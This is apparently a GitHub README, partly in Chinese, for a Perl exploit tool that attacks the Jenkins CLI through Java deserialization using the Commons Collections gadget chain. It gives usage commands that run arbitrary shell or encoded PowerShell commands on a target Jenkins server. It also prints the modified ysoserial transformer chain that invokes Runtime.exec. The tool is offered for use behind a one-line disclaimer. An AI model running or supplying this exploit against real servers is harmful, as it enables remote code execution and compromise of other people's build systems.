/jenkins-cli-exploit

Jenkins CommonCollections Exploit

Primary LanguagePerl

漏洞详情

http://tools.changesec.com/Jenkins-CommonCollections-Exploit/

jenkins-cli-exploit

花时间学了一下 transformer,这个版本支持任意命令!

安装环境

cpan IPC::Run

利用方法

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'
./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'

来个截图,

![截图] (https://raw.githubusercontent.com/CaledoniaProject/jenkins-cli-exploit/master/contrib/sample.jpg "Desktop screenshot")

源代码

官方的 ysoserial 实现存在缺陷,不能正确执行任意命令,已经改掉,现在支持两个新的 Collection,

分别为,

CommonsCollections1Linux
CommonsCollections1Win

修改点,你懂的,

		final String[] execArgs = new String[] { "sh", "-c", command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String[].class }, new Object[] {
                        execArgs }),
				new ConstantTransformer(1) };

代码懒得上传了,直接用lib的就可以

Legal Disclaimer

Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.